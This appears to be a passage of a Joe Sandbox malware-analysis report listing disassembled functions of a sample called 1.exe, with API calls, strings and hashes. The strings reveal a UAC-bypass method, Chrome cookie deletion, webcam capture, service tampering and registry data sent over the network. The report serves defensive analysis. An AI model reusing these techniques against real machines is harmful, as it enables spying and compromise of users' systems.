                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                  • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                  • String ID: 8mG
                                                  • API String ID: 2536120697-3990007011
                                                  • Opcode ID: d6f56902d4e8762935de702d4c1b953921ac7c6d7eb456f7c36ab316a66f2fb3
                                                  • Instruction ID: 3a14b803bc510f5ed1108d30ac07207671fc4f07faef22c9ffd8c11cb1ae2def
                                                  • Opcode Fuzzy Hash: d6f56902d4e8762935de702d4c1b953921ac7c6d7eb456f7c36ab316a66f2fb3
                                                  • Instruction Fuzzy Hash: D3112332900124A7CB14EBAAD8018DEBBA99F44364F11456FFE04B72E1DB789E41CBD8
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                  • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                  • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                  • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                  • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                  APIs
                                                  • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\1.exe), ref: 0040760B
                                                    • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                    • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                  • CoUninitialize.OLE32 ref: 00407664
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InitializeObjectUninitialize_wcslen
                                                  • String ID: C:\Users\user\Desktop\1.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                  • API String ID: 3851391207-52616271
                                                  • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                  • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                  • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                  • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                  APIs
                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                  • GetLastError.KERNEL32 ref: 0040BB22
                                                  Strings
                                                  • UserProfile, xrefs: 0040BAE8
                                                  • [Chrome Cookies not found], xrefs: 0040BB3C
                                                  • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteErrorFileLast
                                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                  • API String ID: 2018770650-304995407
                                                  • Opcode ID: 7bdd53de2c7ce75327e0ce8a061dea47c63620c1b54bd56443db715df27270fd
                                                  • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                  • Opcode Fuzzy Hash: 7bdd53de2c7ce75327e0ce8a061dea47c63620c1b54bd56443db715df27270fd
                                                  • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                  APIs
                                                  • _free.LIBCMT ref: 00444106
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00444118
                                                  • _free.LIBCMT ref: 0044412B
                                                  • _free.LIBCMT ref: 0044413C
                                                  • _free.LIBCMT ref: 0044414D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID: IP
                                                  • API String ID: 776569668-2933993764
                                                  • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                  • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                  • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                  • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                  APIs
                                                  • __allrem.LIBCMT ref: 0043ACE9
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                  • __allrem.LIBCMT ref: 0043AD1C
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                  • __allrem.LIBCMT ref: 0043AD51
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                  • String ID:
                                                  • API String ID: 1992179935-0
                                                  • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                  • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                  • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                  • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                  APIs
                                                  • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                                    • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: H_prologSleep
                                                  • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$XNG
                                                  • API String ID: 3469354165-985523790
                                                  • Opcode ID: e1204afd114d569ccab25cda15caa74d48df92d131874986d17c16c419c57756
                                                  • Instruction ID: 7593a199e81997f2aad1dc538160579efde4e563a54277089fa649d8e7e3dbe8
                                                  • Opcode Fuzzy Hash: e1204afd114d569ccab25cda15caa74d48df92d131874986d17c16c419c57756
                                                  • Instruction Fuzzy Hash: 2A51E0B1A042106BCA14FB369D0A66E3655ABC4748F00443FFA09676E2DF7D8E46839E
                                                  APIs
                                                    • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                  • SetLastError.KERNEL32(000000C1,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                  • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                                  • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,00000000), ref: 00411E04
                                                    • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00411CEE
                                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,00000000), ref: 00411E4B
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000), ref: 00411E52
                                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411F65
                                                    • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,00000000), ref: 00412122
                                                    • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 00412129
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                  • String ID:
                                                  • API String ID: 3950776272-0
                                                  • Opcode ID: 0997a6c101f2dd0e8850336bac1793923a5345a50e97098554ef69f44a303648
                                                  • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                  • Opcode Fuzzy Hash: 0997a6c101f2dd0e8850336bac1793923a5345a50e97098554ef69f44a303648
                                                  • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __cftoe
                                                  • String ID:
                                                  • API String ID: 4189289331-0
                                                  • Opcode ID: 30f97a14dd6f87c9245b8e0b778041a74f07a421c1ac77e9beff42b74887127b
                                                  • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                  • Opcode Fuzzy Hash: 30f97a14dd6f87c9245b8e0b778041a74f07a421c1ac77e9beff42b74887127b
                                                  • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                  • String ID:
                                                  • API String ID: 493672254-0
                                                  • Opcode ID: 0130aacd1f4cb69282ea14a16938802469d5c4dda3d5db020e955f9e2fdd845d
                                                  • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                  • Opcode Fuzzy Hash: 0130aacd1f4cb69282ea14a16938802469d5c4dda3d5db020e955f9e2fdd845d
                                                  • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                  APIs
                                                  • GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                  • _free.LIBCMT ref: 004482CC
                                                  • _free.LIBCMT ref: 004482F4
                                                  • SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 00448301
                                                  • SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                  • _abort.LIBCMT ref: 00448313
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free$_abort
                                                  • String ID:
                                                  • API String ID: 3160817290-0
                                                  • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                  • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                  • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                  • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: da25c4a2fc77098a4a683efa646135eeae362fb0c50f8866f40af29fba2aa84a
                                                  • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                  • Opcode Fuzzy Hash: da25c4a2fc77098a4a683efa646135eeae362fb0c50f8866f40af29fba2aa84a
                                                  • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: 426268ecec94af397b18c47ce65ea81eab46c63cf67684dc15a7ac96c363e00e
                                                  • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                  • Opcode Fuzzy Hash: 426268ecec94af397b18c47ce65ea81eab46c63cf67684dc15a7ac96c363e00e
                                                  • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: d19bf778474731df03bedaf610c0d43d77923041b4af8b1f3e6d21ae90cf369c
                                                  • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                  • Opcode Fuzzy Hash: d19bf778474731df03bedaf610c0d43d77923041b4af8b1f3e6d21ae90cf369c
                                                  • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
                                                    • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                    • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnumInfoOpenQuerysend
                                                  • String ID: (aF$,aF$xdF
                                                  • API String ID: 3114080316-1322504040
